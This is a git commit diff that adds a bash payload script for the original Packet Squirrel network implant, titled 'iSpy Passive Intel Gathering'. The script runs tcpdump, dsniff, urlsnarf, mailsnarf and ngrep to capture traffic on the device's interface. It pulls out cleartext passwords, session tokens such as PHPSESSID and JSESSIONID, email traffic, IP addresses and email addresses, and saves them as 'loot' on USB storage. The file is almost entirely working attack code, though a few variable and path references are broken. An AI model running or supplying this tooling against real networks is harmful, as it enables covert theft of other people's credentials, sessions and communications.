Update repos for Packet Squirrel Mk 2 release

2025-12-19 09:48:47 +00:00 · 2023-07-24 14:58:18 -04:00
parent 2181bf89e5
commit d3250b4165
56 changed files with 731 additions and 7 deletions
--- a/legacy-mk1/payloads/library/sniffing/ispyintel/payload.sh
+++ b/legacy-mk1/payloads/library/sniffing/ispyintel/payload.sh
@@ -0,0 +1,187 @@
+#!/bin/bash
+#
+# This payload is for the original Packet Squirrel.  It may not work on 
+# the Packet Squirrel Mark II
+#
+# Title:		iSpy Passive Intel Gathering
+
+# Description:		Launches various tools to sniff out intel data.
+#			Payload will run until the button is pressed.
+
+# Author: 		infoskirmish.com
+# Version:		1.0
+# Category:		sniffing
+# Target: 		Any
+# Net Mode:		Any (default: Transparent)
+
+# LEDs
+# SUCCESS:		Payload ended complete
+# FAIL:			No USB storage found
+
+lootPath="/mnt/loot/intel"			# Path to loot
+mode="TRANSPARENT"				# Network mode we want to use
+interface="lo"				# Interface to listen on
+Date=$(date +%Y-%m-%d-%H%M)			# Date format to use for log files
+dsnifflog="dsniff_$Date.log"			# DSNiff log file name
+urlsnifflog="urlsnarf_$Date.log"		# URLSniff log file name
+tcpdumplog="tcpdump_$Date.pcap"			# TCPDump log file name
+httppwdlog="httpPasswords_$Date.pcap"		# Potential HTTP password file name
+sessionidlog="sessionids_$Date.pcap"		# Potential Session IDs file name
+mailsnarfLog="mailsnarf_$Date.log"		# Mailsnarf data log file path.
+
+function monitor_space() {
+	while true
+	do
+		[[ $(df | grep /mnt | awk '{print $4}') -lt 10000 ]] && {
+			kill $1
+			LED G SUCCESS
+			sync
+			break
+		}
+		sleep 5
+	done
+}
+
+function finish() {
+
+	# Kill URLSnarff
+    echo "URLSnarff ending pid=$1" >> $1/log.txt
+	kill $1
+	wait $1
+
+	# Kill DNSniff
+    echo "DNSniff ending pid=$2" >> $2/log.txt
+	kill $2
+	wait $2
+
+	# Kill TCPDump
+    echo "TCPDump ending pid=$3" >> $3/log.txt
+	kill $3
+	wait $3
+
+	# Kill HTTP Password NGREP
+    echo "HTTP Password NGREP ending pid=$4" >> $4/log.txt
+	kill $4
+	wait $4
+
+	# Kill Session NGREP
+    echo "HTTP Session NGREP ending pid=$5" >> $5/log.txt
+	kill $5
+	wait $5
+    
+    # Kill Mail Snarf
+    echo "Mail Snarf ending pid=$6" >> $6/log.txt
+    kill $6
+    wait $6
+
+	# I found that if this payload had been running awhile the next two steps may take a bit. It is useful to have some kind of indication
+	# that the payload accepted your button push and is responding. Thus the rapid white blink.
+	LED W VERYFAST
+
+	# Dump all unique IP address from TCP Dump file.
+	tcpdump -qns 0 -X -r $lootPath/$tcpdumplog | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" | sort | uniq >> $lootPath/ipv4found_$Date.txt
+
+	# Ok this is a really stupid grep pattern matching to search for emails; it is meant to give an over view of what is possible.
+	tcpdump -qns 0 -X -r $lootPath/$tcpdumplog | grep -Eiv "[\.]{2}" | grep -oE "\b[a-zA-Z0-9.-]+@[a-zA-Z0-9.-]+\.[a-zA-Z0-9.-]+\b" | sort | uniq >> $lootPath/maybeEmails_$Date.txt
+
+	sync
+
+	# Indicate successful shutdown
+	LED R SUCCESS
+	sleep 1
+
+	# Halt the system; turn off LED
+	LED OFF
+	halt
+}
+
+function run() {
+
+	# Create loot directory
+	mkdir -p $lootPath &> /dev/null
+
+	# Start tcpdump on the specified interface
+	tcpdump -i $interface -w $lootPath/$tcpdumplog &>/dev/null &
+	tpid=$!
+
+	# Log TCP Dump Start
+	echo "TCPDump started pid=$tpid" >> $lootPath/log.txt
+
+	# Start urlsnarff on the specified interface
+	urlsnarf -n -i $interface >> $lootPath/$urlsnifflog &
+	urlid=$!
+
+	# Log URL Snarff Start
+	echo "URLSnarf started pid=$urlid" >> $lootPath/log.txt
+
+	# Start dsniff on the specified interface
+	dsniff -c -m -i $interface -w $lootPath/$dsnifflog &
+	dsniffid=$!
+
+	# Log DSNiff Start
+	echo "DSNiff started pid=$dsniffid" >> $lootPath/log.txt
+
+	# Log potential plain text user names and passwords on port 80 and 21
+	# The thing is port 21 is the defult ftp port. Passwords and user names are exchanged in clear text!!!
+	ngrep -d $interface -i "user_pass|userid|pass|pwd|password|login|user_login|usr|USER" -W byline port 80 or port 21 -O $lootPath/$httppwdlog &	
+	pwdgrep=$!
+
+	# Log Password NGREP Start
+	echo "Password NGREP started pid=$pwdgrep" >> $lootPath/log.txt
+
+	# Log potential plain text session ids, tokens, etc.
+	ngrep -d $interface -i "session|sessid|token|loggedin|PHPSESSID|CFTOKEN|CFID|JSESSIONID|sessionid" -W byline port 80 or port 21 -O $lootPath/$sessionidlog &
+	sessiongrep=$!
+
+	# Log Session NGREP Start
+	echo "Session NGREP started pid=$sessiongrep" >> $lootPath/log.txt
+
+	# Log mailsnarf data
+	mailsnarf -i $interface $lootPath/$mailsnarflog &
+	mailsnarfid=$!
+
+	# Log mailsnarf Start.
+	echo "Mailsnarf started pid=$mailsnarfid" >> $lootPath/log.txt
+
+	# Wait for button to be pressed (disable button LED)
+	NO_LED=true BUTTON
+	finish $urlid $dsniffid $tpid $pwdgrep $sessiongrep $mailsnarfid
+}
+
+
+# This payload will only run if we have USB storage
+if [ -d "/mnt/loot" ]; then
+
+    # Set networking to TRANSPARENT mode and wait five seconds
+    NETMODE $mode >> $lootPath/log.txt
+    sleep 5
+
+    # Lets make sure the interface the user wanted actually exisits.
+    if [[ $(ifconfig |grep $interface) ]]; then
+
+	   echo "" > $lootPath/log.txt
+
+	   LED ATTACK
+	   run &
+	   monitor_space $! &
+       
+    else
+
+	   # Interface could not be found; log it in ~/payload/switch1/log.txt
+       	   ifconfig > $lootPath/log.txt
+	   echo "Could not load interface $interface. Stopping..." >> $lootPath/log.txt
+       
+	   # Display FAIL LED 
+	   LED FAIL
+
+    fi
+
+else
+
+	# USB storage could not be found; log it in ~/payload/switch1/log.txt
+	echo "Could not load USB storage. Stopping..." > log.txt
+
+	# Display FAIL LED 
+	LED FAIL
+
+fi